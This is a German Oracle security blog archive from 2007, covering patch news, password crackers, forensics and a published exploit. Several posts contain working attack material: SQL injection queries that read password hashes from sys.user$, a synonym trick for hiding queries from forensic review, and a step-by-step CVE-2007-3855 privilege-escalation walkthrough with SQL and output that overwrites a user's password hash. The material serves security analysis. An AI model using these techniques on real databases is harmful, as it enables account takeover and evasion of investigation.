Archive for the ‘Allgemein’ Category

« Older Entries
Newer Entries »

Oracle CPU Oktober 2007 – Vorankündigung

Sonntag, Oktober 14th, 2007

Nächste Woche Dienstag ist es wieder so weit. Oracle veröffentlicht den letzten Oracle CPU Oktober 2007 in diesem Jahr. Diesmal werden insgesamt 51 Sicherheitsfehler in den verschiedenen Oracle Produkten korrigiert. Davon betreffen 27 der 51 Fehler die Oracle Datenbank. 5 davon sind remote ausnutzbar, aber zumindestens unsere Findings nicht besonders kritisch.

Am Freitag hat Oracle uns bereits mitgeteilt, dass diesmal (wahrscheinlich) 14 unserer Fehler in der Datenbank korrigiert werden, darunter auch einige die Remote ausnutzbar sind. Damit sind mehr als 50% aller gemeldeten Fehler in der DB von Red-Database-Security gefunden worden. Auch einer der Fehler von uns in Database Vault wird korrigiert.

Mehr Informationen gibt es nach der Analyse bzw. auf den beiden Seminaren der Oracle University : „Hacking für Oracle DBA’s

Posted in Allgemein, CPUOct2007, Database Vault | No Comments »

Oracle SQL Injection Cheat Sheet

Dienstag, Oktober 2nd, 2007

Die folgende Url enthält ein cheat sheet für Oracle SQL Injection. Nicht vollständig , einige statements sind zu kompliziert. (z.B. SELECT table_name FROM all_tables WHERE TABLESPACE_NAME=’USERS‘ or SELECT username, FROM all_users UNION SELECT name, password FROM sys.user$, better: SELECT name, password FROM sys.user$ where type#=1).

Posted in Allgemein | No Comments »

THC veröffentlicht den Passwort Cracker „OrakelCrackert“ für Oracle 11g

Dienstag, Oktober 2nd, 2007

Van Hauser von THC hat mich heute bei einer Tasse Tee darauf aufmerksam gemacht, dass vonjeek/THC am 26. September einen Password Cracker für Oracle 11g auf der THC Webseite namens OrakelCrackert veröffentlicht hat. OrakelCrackert überprüft ungefähr 400.000 SHA-1 Passworte/Seckunde auf meinem 2 GHz Core2Duo und ist damit genauso schnell wie checkpwd 2.0, das nächste Woche veröffentlicht wird.

THC Orakelcrackert 1.00



An dieser Stelle stand bis vor kurzem, dass THCGuesser die Passwortliste von checkpwd verwendet. Dies ist nicht richtig. An dieser Stelle nochmal Entschuldigung für diese falsche Behauptung.


Weiterhin richtig ist und bleibt, dass das „Ausleihen“ von Textdateien öfters praktiziert wird, z.B. bei der von mir zusammengestellten Liste von Standard SIDs (z.B. von sidguesser von Cqure bzw. ora-getsid von NGS Software oder dem russischen Tool coss). Diese Tools verwenden meine Liste, die auch meine privaten SIDs meiner Testsysteme enthalten ….

				


				
 Posted in 11g, Allgemein, software |   No Comments »


			


				

				
Neue Version von Sidguess

				Dienstag, Oktober 2nd, 2007

				

					
Gestern habe ich eine aktualisierte Version von  sidguess für Windows und MacOS hochgeladen. In dieser Version (1.0.2) funktioniert nun der Brute Force Modus zum Erraten der SIDs korrect.

				


				
 Posted in Allgemein |   No Comments »


			


				

				
Oracle 0xDEADF00D

				Samstag, September 22nd, 2007

				

					
Thorsten Schröder und Felix „FX“ Lindner von Recurity Labs GmbH haben gerade einen sehr lesenswerten Artikel über die Erfahrungen bei der Suche nach dem neuen Oracle 11g Passwort-Algorithmus gepostet.

				


				
 Posted in Allgemein |   No Comments »


			


				

				
Exklusive Partnerschaft zwischen Red-Database-Security GmbH und Pete Finnigan Ltd.

				Dienstag, August 21st, 2007

				

					
Red-Database-Security GmbH und Pete Finnigan Ltd arbeiten ab sofort in einer exklusiven Partnerschaft zusammen:


Eine der ersten gemeinsamen Aktivitaeten ist ein gemeinsames Oracle Anti-Hacker-Training in London, UK vom 29. Oktober bis zum 2. November.

Weiterhin wird Pete Finnigan auf der DOAG mit Alexander Kornbrust den Vortrag: „Best of Oracle Security  2007“ halten.

				


				
 Posted in Allgemein, Oracle, Security |   1 Comment »


			


				

				
Oracle-Deutschlandchef Jürgen Kunz über Oracle Security

				Montag, August 13th, 2007

				

					
In einem Interview mit der CZ kommt der Deutschland Chef von Oracle Jürgen Kunz zu einem interessanten Schluss bzgl. Oracle Sicherheit “ Es ist in der Vergangenheit niemandem gelungen, über die Datenbank in unternehmenskritische Applikationen einzudringen“…

Interessant aber definitiv falsch. Wie bei jedem System werden meistens die schwächsten Stellen ausgenutzt. Und z.T. ist das eben die Datenbank, meistens aber die Anwendung. Das hängt vom Angreifer ab.


Bzgl. des Patchmanagements gebe ich allerdings Jürgen Kunz recht, dort sind auch die Anwender gefordert. Auch wenn das in der Vergangenheit nicht immer einfach war (siehe auch Probleme Oracle CPU April 2007 & Oracle 8.0.5 Clients oder Oracle Oktober/Januar CPU führt zur RMAN-Problemen). Oftmals ist auch schlichtweg wegen Patch-Konflikten nicht möglich, die Oracle Patches einzuspielen, weshalb nun die napply-Patches eingeführt wurden.

Oracle Security ist nicht nur ein Problem, das gelöst werden muss, sondern das komplexe Zusammenspiel vieler Faktoren (Oracle DB, Patches, Konfiguration, Anwendungen, DBAs, …). Und da muss jeder seiner Teil dazu beitragen.

				


				
 Posted in Allgemein, Oracle Security |   No Comments »


			


				

				
Whitepaper über Oracle Forensik

				Sonntag, August 12th, 2007

				

					
David Litchfield hat auf seiner Seite ein neues, kurzes Whitepaper „Finding Evidence of Data Theft in the Absence of Auditing„veröffentlicht.


In dem Whitepaper beschreibt David, wie man Spuren von Select-Abfragen finden kann, sofern kein Auditing eingeschaltet ist. Dazu verwendet er beispielsweise die View v$sql oder  wrh$sqlstat. Dies kann ein Angreifer mit Hilfe eines (private) Synonyms aber umgehen:


SQL> create synonym alex for sys.dba_users;


SQL> select * from alex;


Die Vorgehensweise ist meiner Erfahrung nach meistens nicht in der Praxis einzusetzen, da zwischen einem Vorfall und der Untersuchung oftmals Wochen/Monate vergehen. Bis dahin ist aber V$SQL gelöscht. Und die Tabelle wrh$sqlstat kann vom (cleveren) Angreifer modifiziert werden.

				


				
 Posted in Allgemein, Forensik |   No Comments »


			


				

				
Oracle 11g ist verfügbar

				Freitag, August 10th, 2007

				

					
Oracle 11g ist zum download verfügbar (bisher nur Linux).

				


				
 Posted in 11g, Allgemein, Oracle |   No Comments »


			


				

				
Exploit für Create-View Problem wurde veröffentlicht

				Sonntag, Juli 22nd, 2007

				

					
Andrea Purificato hat auf seiner Webseite einen Exploit für das Create-View-Problem (DB17 bzw CVE-2007-3855, das von RDS an Oracle gemeldet), das mit dem Juli 2007 CPU korrigiert wurde.


In dem veröffentlichten Exploit wird über eine View das Passwort in der Tabelle SYS.USER$ mit Hilfe des Update Kommandos aktualisiert. Ganz so wie auf der Webseite beschrieben, funktioniert dieser Exploit aber dennoch nicht, da man Passworte nicht direkt (und von Oracle supported) via Update ändern kann.


Beispiel:

— Zuerst berechnen wir Offline den Passwort Hash für den Benutzer RDS und die Passworte RDS und HACKED

c:\tools>makepwd.exe RDS RDS

B2ABF50FCECAE7CB


c:\tools>makepwd.exe RDS HACKED

7B843A192FF96BE9


— Im nächsten Schritt verbinden wir uns zur Datenbank und aktualisieren den Passwort-Hash über das Update Kommando

SQL> connect cpu/cpu

Connected.

SQL> create or replace view bunkerview as

2    select x.name,x.password from sys.user$ x left outer join sys.user$ y on

x.name=y.name;


View created.

SQL> update cpu.bunkerview set password=’7B843A192FF96BE9′ where name =’RDS‘;


1 row updated.


SQL> commit;


Commit complete.


— Das Passwort ist nun auf HACKED geändert worden.


SQL> select password from sys.user$ where name=’RDS‘;


PASSWORD

——————————

7B843A192FF96BE9

— Aber dennoch klappt der Connect nicht…

SQL> connect rds/hacked

ERROR:

ORA-01017: invalid username/password; logon denied


Warning: You are no longer connected to ORACLE.


— Damit dieser Exploit zusammen mit der Passwort-Änderung funktioniert, muss man allerdings  die Datenbank neu starten. Nach dem Neustart funktioniert dann der per Update gesetzte Passwort Hash.


C:\>sqlplus rds/hacked


SQL*Plus: Release 10.2.0.3.0 – Production on Sun Jul 22 18:24:41 2007


Copyright (c) 1982, 2006, Oracle.  All Rights Reserved.


Connected to:

Oracle Database 10g Enterprise Edition Release 10.2.0.3.0 – Production

With the Partitioning, OLAP and Data Mining Scoring Engine options


SQL>

				


				
 Posted in Allgemein, CPUJul2007, Exploit |   1 Comment »


			


		
		

			
« Older Entries

			
Newer Entries »